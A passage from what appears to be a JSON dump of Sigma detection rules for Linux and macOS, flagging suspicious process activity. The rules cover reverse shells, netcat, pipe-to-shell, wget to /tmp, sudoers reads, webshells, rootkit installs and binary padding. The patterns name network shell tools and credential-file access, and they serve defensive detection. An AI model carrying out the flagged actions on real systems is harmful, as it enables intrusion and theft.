    "content": "title: Suspicious Java Children Processes\nid: d292e0af-9a18-420c-9525-ec0ac3936892\nstatus: test\ndescription: Detects java process spawning suspicious children\nreferences:\n    - https://www.tecmint.com/different-types-of-linux-shells/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-03\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        ParentImage|endswith: '/java'\n        CommandLine|contains:\n            - '/bin/sh'\n            - 'bash'\n            - 'dash'\n            - 'ksh'\n            - 'zsh'\n            - 'csh'\n            - 'fish'\n            - 'curl'\n            - 'wget'\n            - 'python'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml",
    "content": "title: Linux Network Service Scanning Tools Execution\nid: 3e102cd9-a70d-4a7a-9508-403963092f31\nstatus: test\ndescription: Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md\n    - https://github.com/projectdiscovery/naabu\n    - https://github.com/Tib3rius/AutoRecon\nauthor: Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure])\ndate: 2020-10-21\nmodified: 2024-09-19\ntags:\n    - attack.discovery\n    - attack.t1046\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_netcat:\n        Image|endswith:\n            - '/nc'\n            - '/ncat'\n            - '/netcat'\n            - '/socat'\n    selection_network_scanning_tools:\n        Image|endswith:\n            - '/autorecon'\n            - '/hping'\n            - '/hping2'\n            - '/hping3'\n            - '/naabu'\n            - '/nmap'\n            - '/nping'\n            - '/telnet' # could be wget, curl, ssh, many things. basically everything that is able to do network connection. consider fine tuning\n            - '/zenmap'\n    filter_main_netcat_listen_flag:\n        CommandLine|contains:\n            - ' --listen '\n            - ' -l '\n    condition: (selection_netcat and not filter_main_netcat_listen_flag) or selection_network_scanning_tools\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml",
    "content": "title: Linux Shell Pipe to Shell\nid: 880973f3-9708-491c-a77b-2a35a1921158\nstatus: test\ndescription: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-14\nmodified: 2022-07-26\ntags:\n    - attack.defense-evasion\n    - attack.t1140\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|startswith:\n            - 'sh -c '\n            - 'bash -c '\n    selection_exec:\n        - CommandLine|contains:\n              - '| bash '\n              - '| sh '\n              - '|bash '\n              - '|sh '\n        - CommandLine|endswith:\n              - '| bash'\n              - '| sh'\n              - '|bash'\n              - ' |sh'\n    condition: all of selection*\nfalsepositives:\n    - Legitimate software that uses these patterns\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_process_reading_sudoers.yml",
    "content": "title: Access of Sudoers File Content\nid: 0f79c4d2-4e1f-4683-9c36-b5469a665e06\nstatus: test\ndescription: Detects the execution of a text-based file access or inspection utilities to read the content of /etc/sudoers in order to potentially list all users that have sudo rights.\nreferences:\n    - https://github.com/sleventyeleven/linuxprivchecker/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-20\nmodified: 2025-06-04\ntags:\n    - attack.reconnaissance\n    - attack.t1592.004\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith:\n            - '/cat'\n            - '/ed'\n            - '/egrep'\n            - '/emacs'\n            - '/fgrep'\n            - '/grep'\n            - '/head'\n            - '/less'\n            - '/more'\n            - '/nano'\n            - '/tail'\n        CommandLine|contains: ' /etc/sudoers'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml",
    "content": "title: Linux Recon Indicators\nid: 0cf7a157-8879-41a2-8f55-388dd23746b7\nstatus: test\ndescription: Detects events with patterns found in commands used for reconnaissance on linux systems\nreferences:\n    - https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-20\ntags:\n    - attack.reconnaissance\n    - attack.t1592.004\n    - attack.credential-access\n    - attack.t1552.001\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        CommandLine|contains:\n            - ' -name .htpasswd'\n            - ' -perm -4000 '\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_sensitive_file_access.yml",
    "content": "title: Potential Suspicious Change To Sensitive/Critical Files\nid: 86157017-c2b1-4d4a-8c33-93b8e67e4af4\nstatus: test\ndescription: Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system.\nreferences:\n    - https://learn.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor\nauthor: '@d4ns4n_ (Wuerth-Phoenix)'\ndate: 2023-05-30\ntags:\n    - attack.impact\n    - attack.t1565.001\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img_1:\n        Image|endswith:\n            - '/cat'\n            - '/echo'\n            - '/grep'\n            - '/head'\n            - '/more'\n            - '/tail'\n        CommandLine|contains: '>'\n    selection_img_2:\n        Image|endswith:\n            - '/emacs'\n            - '/nano'\n            - '/sed'\n            - '/vi'\n            - '/vim'\n    selection_paths:\n        CommandLine|contains:\n            - '/bin/login'\n            - '/bin/passwd'\n            - '/boot/'\n            - '/etc/*.conf'\n            - '/etc/cron.' # Covers different cron config files \"daily\", \"hourly\", etc.\n            - '/etc/crontab'\n            - '/etc/hosts'\n            - '/etc/init.d'\n            - '/etc/sudoers'\n            - '/opt/bin/'\n            - '/sbin' # Covers: '/opt/sbin', '/usr/local/sbin/', '/usr/sbin/'\n            - '/usr/bin/'\n            - '/usr/local/bin/'\n    condition: 1 of selection_img_* and selection_paths\nfalsepositives:\n    - Some false positives are to be expected on user or administrator machines. Apply additional filters as needed.\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml",
    "content": "title: Shell Execution Of Process Located In Tmp Directory\nid: 2fade0b6-7423-4835-9d4f-335b39b83867\nstatus: test\ndescription: Detects execution of shells from a parent process located in a temporary (/tmp) directory\nreferences:\n    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html\n    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/\n    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\n    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-06-02\ntags:\n    - attack.execution\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        ParentImage|startswith: '/tmp/'\n        Image|endswith:\n            - '/bash'\n            - '/csh'\n            - '/dash'\n            - '/fish'\n            - '/ksh'\n            - '/sh'\n            - '/zsh'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml",
    "content": "title: Execution Of Script Located In Potentially Suspicious Directory\nid: 30bcce26-51c5-49f2-99c8-7b59e3af36c7\nstatus: test\ndescription: Detects executions of scripts located in potentially suspicious locations such as \"/tmp\" via a shell such as \"bash\", \"sh\", etc.\nreferences:\n    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html\n    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/\n    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\n    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-06-02\ntags:\n    - attack.execution\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_img:\n        Image|endswith:\n            - '/bash'\n            - '/csh'\n            - '/dash'\n            - '/fish'\n            - '/ksh'\n            - '/sh'\n            - '/zsh'\n    selection_flag:\n        CommandLine|contains: ' -c '\n    selection_paths:\n        # Note: Add more suspicious paths\n        CommandLine|contains: '/tmp/'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml",
    "content": "title: System Information Discovery\nid: 42df45e7-e6e9-43b5-8f26-bec5b39cc239\nstatus: stable\ndescription: Detects system information discovery commands\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md\nauthor: Ömer Günal, oscd.community\ndate: 2020-10-08\nmodified: 2021-09-14\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith:\n            - '/uname'\n            - '/hostname'\n            - '/uptime'\n            - '/lspci'\n            - '/dmidecode'\n            - '/lscpu'\n            - '/lsmod'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: informational\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml",
    "content": "title: System Network Connections Discovery - Linux\nid: 4c519226-f0cd-4471-bd2f-6fbb2bb68a79\nstatus: test\ndescription: Detects usage of system utilities to discover system network connections\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2020-10-19\nmodified: 2023-01-17\ntags:\n    - attack.discovery\n    - attack.t1049\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith:\n            - '/who'\n            - '/w'\n            - '/last'\n            - '/lsof'\n            - '/netstat'\n    filter_landscape_sysinfo:\n        ParentCommandLine|contains: '/usr/bin/landscape-sysinfo'\n        Image|endswith: '/who'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Legitimate activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml",
    "content": "title: System Network Discovery - Linux\nid: e7bd1cfa-b446-4c88-8afb-403bcd79e3fa\nstatus: test\ndescription: Detects enumeration of local network configuration\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md\nauthor: Ömer Günal and remotephone, oscd.community\ndate: 2020-10-06\nmodified: 2022-09-15\ntags:\n    - attack.discovery\n    - attack.t1016\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith:\n            - '/firewall-cmd'\n            - '/ufw'\n            - '/iptables'\n            - '/netstat'\n            - '/ss'\n            - '/ip'\n            - '/ifconfig'\n            - '/systemd-resolve'\n            - '/route'\n    selection_cli:\n        CommandLine|contains: '/etc/resolv.conf'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate administration activities\nlevel: informational\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_systemctl_mask_power_settings.yml",
    "content": "title: Mask System Power Settings Via Systemctl\nid: c172b7b5-f3a1-4af2-90b7-822c63df86cb\nstatus: experimental\ndescription: |\n    Detects the use of systemctl mask to disable system power management targets such as suspend, hibernate, or hybrid sleep.\n    Adversaries may mask these targets to prevent a system from entering sleep or shutdown states, ensuring their malicious processes remain active and uninterrupted.\n    This behavior can be associated with persistence or defense evasion, as it impairs normal system power operations to maintain long-term access or avoid termination of malicious activity.\nauthor: Milad Cheraghi, Nasreddine Bencherchali\ndate: 2025-10-17\nreferences:\n    - https://www.man7.org/linux/man-pages/man1/systemctl.1.html\n    - https://linux-audit.com/systemd/faq/what-is-the-difference-between-systemctl-disable-and-systemctl-mask/\ntags:\n    - attack.persistence\n    - attack.impact\n    - attack.t1653\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_systemctl:\n        Image|endswith: '/systemctl'\n        CommandLine|contains: ' mask'\n    selection_power_options:\n        CommandLine|contains:\n            - 'suspend.target'\n            - 'hibernate.target'\n            - 'hybrid-sleep.target'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_touch_susp.yml",
    "content": "title: Touch Suspicious Service File\nid: 31545105-3444-4584-bebf-c466353230d2\nstatus: test\ndescription: Detects usage of the \"touch\" process in service file.\nreferences:\n    - https://blogs.blackberry.com/\n    - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-01-11\ntags:\n    - attack.defense-evasion\n    - attack.t1070.006\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/touch'\n        CommandLine|contains: ' -t '\n        CommandLine|endswith: '.service'\n    condition: selection\nfalsepositives:\n    - Admin changing date of files.\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml",
    "content": "title: Triple Cross eBPF Rootkit Execve Hijack\nid: 0326c3c8-7803-4a0f-8c5c-368f747f7c3e\nstatus: test\ndescription: Detects execution of a the file \"execve_hijack\" which is used by the Triple Cross rootkit as a way to elevate privileges\nreferences:\n    - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-05\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/sudo'\n        CommandLine|contains: 'execve_hijack'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml",
    "content": "title: Triple Cross eBPF Rootkit Install Commands\nid: 22236d75-d5a0-4287-bf06-c93b1770860f\nstatus: test\ndescription: Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script\nreferences:\n    - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-05\ntags:\n    - attack.defense-evasion\n    - attack.t1014\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/sudo'\n        CommandLine|contains|all:\n            - ' tc '\n            - ' enp0s3 '\n        CommandLine|contains:\n            - ' qdisc '\n            - ' filter '\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_userdel.yml",
    "content": "title: User Has Been Deleted Via Userdel\nid: 08f26069-6f80-474b-8d1f-d971c6fedea0\nstatus: test\ndescription: Detects execution of the \"userdel\" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks\nreferences:\n    - https://linuxize.com/post/how-to-delete-group-in-linux/\n    - https://www.cyberciti.biz/faq/linux-remove-user-command/\n    - https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/\n    - https://linux.die.net/man/8/userdel\nauthor: Tuan Le (NCSGroup)\ndate: 2022-12-26\ntags:\n    - attack.impact\n    - attack.t1531\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/userdel'\n    condition: selection\nfalsepositives:\n    - Legitimate administrator activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml",
    "content": "title: User Added To Root/Sudoers Group Using Usermod\nid: 6a50f16c-3b7b-42d1-b081-0fdd3ba70a73\nstatus: test\ndescription: Detects usage of the \"usermod\" binary to add users add users to the root or suoders groups\nreferences:\n    - https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/\n    - https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/\nauthor: TuanLe (GTSC)\ndate: 2022-12-21\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/usermod'\n        CommandLine|contains:\n            - '-aG root'\n            - '-aG sudoers'\n    condition: selection\nfalsepositives:\n    - Legitimate administrator activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_vim_shell_execution.yml",
    "content": "title: Vim GTFOBin Abuse - Linux\nid: 7ab8f73a-fcff-428b-84aa-6a5ff7877dea\nstatus: test\ndescription: |\n    Detects the use of \"vim\" and it's siblings commands to execute a shell or proxy commands.\n    Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\nreferences:\n    - https://gtfobins.github.io/gtfobins/vim/\n    - https://gtfobins.github.io/gtfobins/rvim/\n    - https://gtfobins.github.io/gtfobins/vimdiff/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-28\nmodified: 2024-09-02\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith:\n            - '/rvim'\n            - '/vim'\n            - '/vimdiff'\n        CommandLine|contains:\n            - ' --cmd'\n            - ' -c '\n    selection_cli:\n        CommandLine|contains:\n            - ':!/'\n            - ':lua '\n            - ':py '\n            - '/bin/bash'\n            - '/bin/dash'\n            - '/bin/fish'\n            - '/bin/sh'\n            - '/bin/zsh'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml",
    "content": "title: Linux Webshell Indicators\nid: 818f7b24-0fba-4c49-a073-8b755573b9c7\nstatus: test\ndescription: Detects suspicious sub processes of web server processes\nreferences:\n    - https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/\n    - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-10-15\nmodified: 2022-12-28\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_general:\n        ParentImage|endswith:\n            - '/httpd'\n            - '/lighttpd'\n            - '/nginx'\n            - '/apache2'\n            - '/node'\n            - '/caddy'\n    selection_tomcat:\n        ParentCommandLine|contains|all:\n            - '/bin/java'\n            - 'tomcat'\n    selection_websphere:  # ? just guessing\n        ParentCommandLine|contains|all:\n            - '/bin/java'\n            - 'websphere'\n    sub_processes:\n        Image|endswith:\n            - '/whoami'\n            - '/ifconfig'\n            - '/ip'\n            - '/bin/uname'\n            - '/bin/cat'\n            - '/bin/crontab'\n            - '/hostname'\n            - '/iptables'\n            - '/netstat'\n            - '/pwd'\n            - '/route'\n    condition: 1 of selection_* and sub_processes\nfalsepositives:\n    - Web applications that invoke Linux command line tools\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml",
    "content": "title: Download File To Potentially Suspicious Directory Via Wget\nid: cf610c15-ed71-46e1-bdf8-2bd1a99de6c4\nstatus: test\ndescription: Detects the use of wget to download content to a suspicious directory\nreferences:\n    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html\n    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/\n    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\n    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-06-02\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/wget'\n    selection_output:\n        - CommandLine|re: '\\s-O\\s' # We use regex to ensure a case sensitive argument detection\n        - CommandLine|contains: '--output-document'\n    selection_path:\n        CommandLine|contains: '/tmp/'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml",
    "content": "title: Potential Xterm Reverse Shell\nid: 4e25af4b-246d-44ea-8563-e42aacab006b\nstatus: test\ndescription: Detects usage of \"xterm\" as a potential reverse shell tunnel\nreferences:\n    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n    - https://www.revshells.com/\nauthor: '@d4ns4n_'\ndate: 2023-04-24\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|contains: 'xterm'\n        CommandLine|contains: '-display'\n        CommandLine|endswith: ':1'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/macos/file_event/file_event_macos_emond_launch_daemon.yml",
    "content": "title: MacOS Emond Launch Daemon\nid: 23c43900-e732-45a4-8354-63e4a6c187ce\nstatus: test\ndescription: Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md\n    - https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-23\nmodified: 2021-11-27\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1546.014\nlogsource:\n    category: file_event\n    product: macos\ndetection:\n    selection_1:\n        TargetFilename|contains: '/etc/emond.d/rules/'\n        TargetFilename|endswith: '.plist'\n    selection_2:\n        TargetFilename|contains: '/private/var/db/emondClients/'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/macos/file_event/file_event_macos_susp_startup_item_created.yml",
    "content": "title: Startup Item File Created - MacOS\nid: dfe8b941-4e54-4242-b674-6b613d521962\nstatus: test\ndescription: |\n    Detects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence.\n    Adversaries may use startup items automatically executed at boot initialization to establish persistence.\n    Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md\n    - https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-14\nmodified: 2024-08-11\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1037.005\nlogsource:\n    category: file_event\n    product: macos\ndetection:\n    selection:\n        TargetFilename|startswith:\n            - '/Library/StartupItems/'\n            - '/System/Library/StartupItems'\n        TargetFilename|endswith: '.plist'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_applescript.yml",
    "content": "title: MacOS Scripting Interpreter AppleScript\nid: 1bc2e6c5-0885-472b-bed6-be5ea8eace55\nstatus: test\ndescription: Detects execution of AppleScript of the macOS scripting language AppleScript.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md\n    - https://redcanary.com/blog/applescript/\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-21\nmodified: 2023-02-01\ntags:\n    - attack.execution\n    - attack.t1059.002\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image|endswith: '/osascript'\n        CommandLine|contains:\n            - ' -e '\n            - '.scpt'\n            - '.js'\n    condition: selection\nfalsepositives:\n    - Application installers might contain scripts as part of the installation process.\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_base64_decode.yml",
    "content": "title: Decode Base64 Encoded Text -MacOs\nid: 719c22d7-c11a-4f2c-93a6-2cfdd5412f68\nstatus: test\ndescription: Detects usage of base64 utility to decode arbitrary base64-encoded text\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2020-10-19\nmodified: 2022-11-26\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: macos\ndetection:\n    selection:\n        Image: '/usr/bin/base64'\n        CommandLine|contains: '-d'\n    condition: selection\nfalsepositives:\n    - Legitimate activities\nlevel: low\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_binary_padding.yml",
    "content": "title: Binary Padding - MacOS\nid: 95361ce5-c891-4b0a-87ca-e24607884a96\nstatus: test\ndescription: Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md\n    - https://linux.die.net/man/1/truncate\n    - https://linux.die.net/man/1/dd\nauthor: 'Igor Fits, Mikhail Larin, oscd.community'\ndate: 2020-10-19\nmodified: 2023-02-17\ntags:\n    - attack.defense-evasion\n    - attack.t1027.001\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection_truncate:\n        Image|endswith: '/truncate'\n        CommandLine|contains: '-s +'\n    selection_dd:\n        Image|endswith: '/dd'\n        CommandLine|contains:\n            - 'if=/dev/zero' # if input is not /dev/zero, then there is no null padding\n            - 'if=/dev/random' # high-quality random data\n            - 'if=/dev/urandom' # low-quality random data\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate script work\nlevel: high\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_change_file_time_attr.yml",
    "content": "title: File Time Attribute Change\nid: 88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0\nstatus: test\ndescription: Detect file time attribute change to hide new or changes to existing files\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md\nauthor: Igor Fits, Mikhail Larin, oscd.community\ndate: 2020-10-19\nmodified: 2022-01-12\ntags:\n    - attack.defense-evasion\n    - attack.t1070.006\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/touch'\n        CommandLine|contains:\n            - '-t'\n            - '-acmr'\n            - '-d'\n            - '-r'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_chflags_hidden_flag.yml",
    "content": "title: Hidden Flag Set On File/Directory Via Chflags - MacOS\nid: 3b2c1059-ae5f-40b6-b5d4-6106d3ac20fe\nstatus: test\ndescription: |\n    Detects the execution of the \"chflags\" utility with the \"hidden\" flag, in order to hide files on MacOS.\n    When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.\nreferences:\n    - https://www.sentinelone.com/labs/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/\n    - https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/\n    - https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf\n    - https://ss64.com/mac/chflags.html\nauthor: Omar Khaled (@beacon_exe)\ndate: 2024-08-21\ntags:\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.command-and-control\n    - attack.t1218\n    - attack.t1564.004\n    - attack.t1552.001\n    - attack.t1105\nlogsource:\n    product: macos\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/chflags'\n        CommandLine|contains: 'hidden '\n    condition: selection\nfalsepositives:\n    - Legitimate usage of chflags by administrators and users.\nlevel: medium\n"
  },
  {
    "path": "rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml",
